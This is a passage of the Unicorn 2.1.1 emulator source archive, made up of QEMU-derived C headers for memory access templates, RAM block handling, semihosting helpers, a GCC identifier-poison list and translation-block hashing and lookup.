SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stb, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); #endif #undef ARG1_DECL #undef ARG1 #undef SUFFIX #undef TARGET_ENDIANNESS ���������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memory_ldst_cached.inc.h��������������������������������������������0000664�0000000�0000000�00000011132�14675241067�0023266�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Memory access templates for MemoryRegionCache * * Copyright (c) 2018 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifdef UNICORN_ARCH_POSTFIX #define ADDRESS_SPACE_LD_CACHED(size) \ glue(glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached)), UNICORN_ARCH_POSTFIX) #define ADDRESS_SPACE_LD_CACHED_SLOW(size) \ glue(glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached_slow)), UNICORN_ARCH_POSTFIX) #define LD_P(size) \ glue(glue(ld, size), glue(ENDIANNESS, _p)) #else #define ADDRESS_SPACE_LD_CACHED(size) \ glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached)) #define ADDRESS_SPACE_LD_CACHED_SLOW(size) \ glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached_slow)) #define LD_P(size) \ glue(glue(ld, size), glue(ENDIANNESS, _p)) #endif static inline uint32_t ADDRESS_SPACE_LD_CACHED(l)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 4 <= cache->len - addr); if (likely(cache->ptr)) { return LD_P(l)((char *)cache->ptr + addr); } else { return ADDRESS_SPACE_LD_CACHED_SLOW(l)(uc, cache, addr, attrs, result); } } static inline uint64_t ADDRESS_SPACE_LD_CACHED(q)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 8 <= cache->len - addr); if (likely(cache->ptr)) { return LD_P(q)((char *)cache->ptr + addr); } else { return ADDRESS_SPACE_LD_CACHED_SLOW(q)(uc, cache, addr, attrs, result); } } static inline uint32_t ADDRESS_SPACE_LD_CACHED(uw)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 2 <= cache->len - addr); if (likely(cache->ptr)) { return LD_P(uw)((char *)cache->ptr + addr); } else { return ADDRESS_SPACE_LD_CACHED_SLOW(uw)(uc, cache, addr, attrs, result); } } #undef ADDRESS_SPACE_LD_CACHED #undef ADDRESS_SPACE_LD_CACHED_SLOW #undef LD_P #ifdef UNICORN_ARCH_POSTFIX #define ADDRESS_SPACE_ST_CACHED(size) \ glue(glue(glue(address_space_st, size), glue(ENDIANNESS, _cached)), UNICORN_ARCH_POSTFIX) #define ADDRESS_SPACE_ST_CACHED_SLOW(size) \ glue(glue(glue(address_space_st, size), glue(ENDIANNESS, _cached_slow)), UNICORN_ARCH_POSTFIX) #define ST_P(size) \ glue(glue(st, size), glue(ENDIANNESS, _p)) #else #define ADDRESS_SPACE_ST_CACHED(size) \ glue(glue(address_space_st, size), glue(ENDIANNESS, _cached)) #define ADDRESS_SPACE_ST_CACHED_SLOW(size) \ glue(glue(address_space_st, size), glue(ENDIANNESS, _cached_slow)) #define ST_P(size) \ glue(glue(st, size), glue(ENDIANNESS, _p)) #endif static inline void ADDRESS_SPACE_ST_CACHED(l)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 4 <= cache->len - addr); if (likely(cache->ptr)) { ST_P(l)((char *)cache->ptr + addr, val); } else { ADDRESS_SPACE_ST_CACHED_SLOW(l)(uc, cache, addr, val, attrs, result); } } static inline void ADDRESS_SPACE_ST_CACHED(w)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 2 <= cache->len - addr); if (likely(cache->ptr)) { ST_P(w)((char *)cache->ptr + addr, val); } else { ADDRESS_SPACE_ST_CACHED_SLOW(w)(uc, cache, addr, val, attrs, result); } } static inline void ADDRESS_SPACE_ST_CACHED(q)(struct uc_struct *uc, MemoryRegionCache *cache, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len && 8 <= cache->len - addr); if (likely(cache->ptr)) { ST_P(q)((char *)cache->ptr + addr, val); } else { ADDRESS_SPACE_ST_CACHED_SLOW(q)(uc, cache, addr, val, attrs, result); } } #undef ADDRESS_SPACE_ST_CACHED #undef ADDRESS_SPACE_ST_CACHED_SLOW #undef ST_P #undef ENDIANNESS ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memory_ldst_phys.inc.h����������������������������������������������0000664�0000000�0000000�00000013040�14675241067�0023042�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Physical memory access templates * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2015 Linaro, Inc. * Copyright (c) 2016 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifdef TARGET_ENDIANNESS static inline uint32_t glue(ldl_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint64_t glue(ldq_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stq_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val) { glue(address_space_stq, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } #else static inline uint32_t glue(ldl_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(ldl_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint64_t glue(ldq_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint64_t glue(ldq_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(ldub_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldub, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl_le, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl_be, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stb_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stb, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw_le, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw_be, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stq_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val) { glue(address_space_stq_le, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stq_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val) { glue(address_space_stq_be, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } #endif #undef ARG1_DECL #undef ARG1 #undef SUFFIX #undef TARGET_ENDIANNESS ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/poison.h������������������������������������������������������������0000664�0000000�0000000�00000005642�14675241067�0020211�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Poison identifiers that should not be used when building target independent device code. */ #ifndef HW_POISON_H #define HW_POISON_H #ifdef __GNUC__ #pragma GCC poison TARGET_I386 #pragma GCC poison TARGET_X86_64 #pragma GCC poison TARGET_AARCH64 #pragma GCC poison TARGET_ALPHA #pragma GCC poison TARGET_ARM #pragma GCC poison TARGET_CRIS #pragma GCC poison TARGET_HPPA #pragma GCC poison TARGET_LM32 #pragma GCC poison TARGET_M68K #pragma GCC poison TARGET_MICROBLAZE #pragma GCC poison TARGET_MIPS #pragma GCC poison TARGET_ABI_MIPSN32 #pragma GCC poison TARGET_ABI_MIPSO32 #pragma GCC poison TARGET_MIPS64 #pragma GCC poison TARGET_ABI_MIPSN64 #pragma GCC poison TARGET_MOXIE #pragma GCC poison TARGET_NIOS2 #pragma GCC poison TARGET_OPENRISC #pragma GCC poison TARGET_PPC #pragma GCC poison TARGET_PPC64 #pragma GCC poison TARGET_ABI32 #pragma GCC poison TARGET_RX #pragma GCC poison TARGET_S390X #pragma GCC poison TARGET_SH4 #pragma GCC poison TARGET_SPARC #pragma GCC poison TARGET_SPARC64 #pragma GCC poison TARGET_TILEGX #pragma GCC poison TARGET_TRICORE #pragma GCC poison TARGET_UNICORE32 #pragma GCC poison TARGET_XTENSA #pragma GCC poison TARGET_ALIGNED_ONLY #pragma GCC poison TARGET_HAS_BFLT #pragma GCC poison TARGET_NAME #pragma GCC poison TARGET_SUPPORTS_MTTCG #pragma GCC poison TARGET_WORDS_BIGENDIAN #pragma GCC poison BSWAP_NEEDED #pragma GCC poison TARGET_LONG_BITS #pragma GCC poison TARGET_FMT_lx #pragma GCC poison TARGET_FMT_ld #pragma GCC poison TARGET_FMT_lu #pragma GCC poison TARGET_PAGE_SIZE #pragma GCC poison TARGET_PAGE_MASK #pragma GCC poison TARGET_PAGE_BITS #pragma GCC poison TARGET_PAGE_ALIGN #pragma GCC poison CPUArchState #pragma GCC poison CPU_INTERRUPT_HARD #pragma GCC poison CPU_INTERRUPT_EXITTB #pragma GCC poison CPU_INTERRUPT_HALT #pragma GCC poison CPU_INTERRUPT_DEBUG #pragma GCC poison CPU_INTERRUPT_TGT_EXT_0 #pragma GCC poison CPU_INTERRUPT_TGT_EXT_1 #pragma GCC poison CPU_INTERRUPT_TGT_EXT_2 #pragma GCC poison CPU_INTERRUPT_TGT_EXT_3 #pragma GCC poison CPU_INTERRUPT_TGT_EXT_4 #pragma GCC poison CPU_INTERRUPT_TGT_INT_0 #pragma GCC poison CPU_INTERRUPT_TGT_INT_1 #pragma GCC poison CPU_INTERRUPT_TGT_INT_2 #pragma GCC poison CONFIG_ALPHA_DIS #pragma GCC poison CONFIG_ARM_A64_DIS #pragma GCC poison CONFIG_ARM_DIS #pragma GCC poison CONFIG_CRIS_DIS #pragma GCC poison CONFIG_HPPA_DIS #pragma GCC poison CONFIG_I386_DIS #pragma GCC poison CONFIG_LM32_DIS #pragma GCC poison CONFIG_M68K_DIS #pragma GCC poison CONFIG_MICROBLAZE_DIS #pragma GCC poison CONFIG_MIPS_DIS #pragma GCC poison CONFIG_NANOMIPS_DIS #pragma GCC poison CONFIG_MOXIE_DIS #pragma GCC poison CONFIG_NIOS2_DIS #pragma GCC poison CONFIG_PPC_DIS #pragma GCC poison CONFIG_RISCV_DIS #pragma GCC poison CONFIG_S390_DIS #pragma GCC poison CONFIG_SH4_DIS #pragma GCC poison CONFIG_SPARC_DIS #pragma GCC poison CONFIG_XTENSA_DIS #pragma GCC poison CONFIG_LINUX_USER #pragma GCC poison CONFIG_KVM #pragma GCC poison CONFIG_SOFTMMU #endif #endif ����������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/ram_addr.h����������������������������������������������������������0000664�0000000�0000000�00000007014�14675241067�0020446�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Declarations for cpu physical memory functions * * Copyright 2011 Red Hat, Inc. and/or its affiliates * * Authors: * Avi Kivity <avi@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or * later. See the COPYING file in the top-level directory. * */ /* * This header is for use by exec.c and memory.c ONLY. Do not include it. * The functions declared here will be removed soon. */ #ifndef RAM_ADDR_H #define RAM_ADDR_H #include "cpu.h" #include "sysemu/tcg.h" #include "exec/ramlist.h" #include "exec/ramblock.h" static inline bool offset_in_ramblock(RAMBlock *b, ram_addr_t offset) { return (b && b->host && offset < b->used_length) ? true : false; } static inline void *ramblock_ptr(RAMBlock *block, ram_addr_t offset) { assert(offset_in_ramblock(block, offset)); return (char *)block->host + offset; } static inline unsigned long int ramblock_recv_bitmap_offset(struct uc_struct *uc, void *host_addr, RAMBlock *rb) { uint64_t host_addr_offset = (uint64_t)(uintptr_t)((char *)host_addr - (char *)rb->host); return host_addr_offset >> TARGET_PAGE_BITS; } RAMBlock *qemu_ram_alloc_from_ptr(struct uc_struct *uc, ram_addr_t size, void *host, MemoryRegion *mr); RAMBlock *qemu_ram_alloc(struct uc_struct *uc, ram_addr_t size, MemoryRegion *mr); void qemu_ram_free(struct uc_struct *uc, RAMBlock *block); #define DIRTY_CLIENTS_ALL ((1 << DIRTY_MEMORY_NUM) - 1) #define DIRTY_CLIENTS_NOCODE (DIRTY_CLIENTS_ALL & ~(1 << DIRTY_MEMORY_CODE)) void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start, ram_addr_t end); static inline bool cpu_physical_memory_get_dirty(ram_addr_t start, ram_addr_t length, unsigned client) { return false; } static inline bool cpu_physical_memory_all_dirty(ram_addr_t start, ram_addr_t length, unsigned client) { return false; } static inline bool cpu_physical_memory_is_clean(ram_addr_t addr) { return true; } static inline void cpu_physical_memory_set_dirty_flag(ram_addr_t addr, unsigned client) { } static inline void cpu_physical_memory_set_dirty_range(ram_addr_t start, ram_addr_t length, uint8_t mask) { } #if !defined(_WIN32) static inline void cpu_physical_memory_set_dirty_lebitmap(unsigned long *bitmap, ram_addr_t start, ram_addr_t pages) { } #endif /* not _WIN32 */ bool cpu_physical_memory_test_and_clear_dirty(ram_addr_t start, ram_addr_t length, unsigned client); static inline void cpu_physical_memory_clear_dirty_range(ram_addr_t start, ram_addr_t length) { } /* Called with RCU critical section */ static inline uint64_t cpu_physical_memory_sync_dirty_bitmap(RAMBlock *rb, ram_addr_t start, ram_addr_t length, uint64_t *real_dirty_pages) { return 0; } #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/ramblock.h����������������������������������������������������������0000664�0000000�0000000�00000001037�14675241067�0020466�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Declarations for cpu physical memory functions * * Copyright 2011 Red Hat, Inc. and/or its affiliates * * Authors: * Avi Kivity <avi@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or * later. See the COPYING file in the top-level directory. * */ /* * This header is for use by exec.c and memory.c ONLY. Do not include it. * The functions declared here will be removed soon. */ #ifndef QEMU_EXEC_RAMBLOCK_H #define QEMU_EXEC_RAMBLOCK_H #include "cpu-common.h" #include "qemu.h" #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/ramlist.h�����������������������������������������������������������0000664�0000000�0000000�00000001063�14675241067�0020346�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef RAMLIST_H #define RAMLIST_H #include "qemu/queue.h" #include "qemu/thread.h" //#include "qemu/rcu.h" //#include "qemu/rcu_queue.h" #define DIRTY_MEMORY_VGA 0 #define DIRTY_MEMORY_CODE 1 #define DIRTY_MEMORY_MIGRATION 2 #define DIRTY_MEMORY_NUM 3 /* num of dirty bits */ #define INTERNAL_RAMBLOCK_FOREACH(block) \ QLIST_FOREACH(block, &uc->ram_list.blocks, next) /* Never use the INTERNAL_ version except for defining other macros */ #define RAMBLOCK_FOREACH(block) INTERNAL_RAMBLOCK_FOREACH(block) #endif /* RAMLIST_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/softmmu-semi.h������������������������������������������������������0000664�0000000�0000000�00000005440�14675241067�0021323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helper routines to provide target memory access for semihosting * syscalls in system emulation mode. * * Copyright (c) 2007 CodeSourcery. * * This code is licensed under the GPL */ #ifndef SOFTMMU_SEMI_H #define SOFTMMU_SEMI_H #include "cpu.h" static inline uint64_t softmmu_tget64(CPUArchState *env, target_ulong addr) { uint64_t val; cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 8, 0); return tswap64(val); } static inline uint32_t softmmu_tget32(CPUArchState *env, target_ulong addr) { uint32_t val; cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 4, 0); return tswap32(val); } static inline uint32_t softmmu_tget8(CPUArchState *env, target_ulong addr) { uint8_t val; cpu_memory_rw_debug(env_cpu(env), addr, &val, 1, 0); return val; } #define get_user_u64(arg, p) ({ arg = softmmu_tget64(env, p); 0; }) #define get_user_u32(arg, p) ({ arg = softmmu_tget32(env, p) ; 0; }) #define get_user_u8(arg, p) ({ arg = softmmu_tget8(env, p) ; 0; }) #define get_user_ual(arg, p) get_user_u32(arg, p) static inline void softmmu_tput64(CPUArchState *env, target_ulong addr, uint64_t val) { val = tswap64(val); cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 8, 1); } static inline void softmmu_tput32(CPUArchState *env, target_ulong addr, uint32_t val) { val = tswap32(val); cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 4, 1); } #define put_user_u64(arg, p) ({ softmmu_tput64(env, p, arg) ; 0; }) #define put_user_u32(arg, p) ({ softmmu_tput32(env, p, arg) ; 0; }) #define put_user_ual(arg, p) put_user_u32(arg, p) static void *softmmu_lock_user(CPUArchState *env, target_ulong addr, target_ulong len, int copy) { uint8_t *p; /* TODO: Make this something that isn't fixed size. */ p = malloc(len); if (p && copy) { cpu_memory_rw_debug(env_cpu(env), addr, p, len, 0); } return p; } #define lock_user(type, p, len, copy) softmmu_lock_user(env, p, len, copy) static char *softmmu_lock_user_string(CPUArchState *env, target_ulong addr) { char *p; char *s; uint8_t c; /* TODO: Make this something that isn't fixed size. */ s = p = malloc(1024); if (!s) { return NULL; } do { cpu_memory_rw_debug(env_cpu(env), addr, &c, 1, 0); addr++; *(p++) = c; } while (c); return s; } #define lock_user_string(p) softmmu_lock_user_string(env, p) static void softmmu_unlock_user(CPUArchState *env, void *p, target_ulong addr, target_ulong len) { if (len) { cpu_memory_rw_debug(env_cpu(env), addr, p, len, 1); } free(p); } #define unlock_user(s, args, len) softmmu_unlock_user(env, s, args, len) #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/target_page.h�������������������������������������������������������0000664�0000000�0000000�00000001047�14675241067�0021157�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Target page sizes and friends for non target files * * Copyright (c) 2017 Red Hat Inc * * Authors: * David Alan Gilbert <dgilbert@redhat.com> * Juan Quintela <quintela@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef EXEC_TARGET_PAGE_H #define EXEC_TARGET_PAGE_H struct uc_struct; size_t qemu_target_page_size(struct uc_struct *uc); int qemu_target_page_bits(struct uc_struct *uc); int qemu_target_page_bits_min(void); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/tb-context.h��������������������������������������������������������0000664�0000000�0000000�00000002202�14675241067�0020756�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Internal structs that QEMU exports to TCG * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef QEMU_TB_CONTEXT_H #define QEMU_TB_CONTEXT_H #include "qemu/thread.h" #include "qemu/qht.h" #define CODE_GEN_HTABLE_BITS 15 #define CODE_GEN_HTABLE_SIZE (1 << CODE_GEN_HTABLE_BITS) typedef struct TranslationBlock TranslationBlock; typedef struct TBContext TBContext; struct TBContext { struct qht htable; /* statistics */ unsigned tb_flush_count; }; #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/tb-hash.h�����������������������������������������������������������0000664�0000000�0000000�00000004076�14675241067�0020230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * internal execution defines for qemu * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef EXEC_TB_HASH_H #define EXEC_TB_HASH_H #include "exec/cpu-defs.h" #include "exec/exec-all.h" #include "qemu/xxhash.h" /* Only the bottom TB_JMP_PAGE_BITS of the jump cache hash bits vary for addresses on the same page. The top bits are the same. This allows TLB invalidation to quickly clear a subset of the hash table. */ #define TB_JMP_PAGE_BITS (TB_JMP_CACHE_BITS / 2) #define TB_JMP_PAGE_SIZE (1 << TB_JMP_PAGE_BITS) #define TB_JMP_ADDR_MASK (TB_JMP_PAGE_SIZE - 1) #define TB_JMP_PAGE_MASK (TB_JMP_CACHE_SIZE - TB_JMP_PAGE_SIZE) static inline unsigned int tb_jmp_cache_hash_page(struct uc_struct *uc, target_ulong pc) { target_ulong tmp; tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); return (tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK; } static inline unsigned int tb_jmp_cache_hash_func(struct uc_struct *uc, target_ulong pc) { target_ulong tmp; tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); return (((tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK) | (tmp & TB_JMP_ADDR_MASK)); } static inline uint32_t tb_hash_func(tb_page_addr_t phys_pc, target_ulong pc, uint32_t flags, uint32_t cf_mask, uint32_t trace_vcpu_dstate) { return qemu_xxhash7(phys_pc, pc, flags, cf_mask, trace_vcpu_dstate); } #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/tb-lookup.h���������������������������������������������������������0000664�0000000�0000000�00000002572�14675241067�0020615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2017, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef EXEC_TB_LOOKUP_H #define EXEC_TB_LOOKUP_H #ifdef NEED_CPU_H #include "cpu.h" #else #include "exec/poison.h" #endif #include "exec/exec-all.h" #include "exec/tb-hash.h" /* Might cause an exception, so have a longjmp destination ready */ static inline TranslationBlock * tb_lookup__cpu_state(CPUState *cpu, target_ulong *pc, target_ulong *cs_base, uint32_t *flags, uint32_t cf_mask) { CPUArchState *env = (CPUArchState *)cpu->env_ptr; TranslationBlock *tb; uint32_t hash; cpu_get_tb_cpu_state(env, pc, cs_base, flags); hash = tb_jmp_cache_hash_func(env->uc, *pc); tb = cpu->tb_jmp_cache[hash]; cf_mask &= ~CF_CLUSTER_MASK; cf_mask |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT; if (likely(tb && tb->pc == *pc && 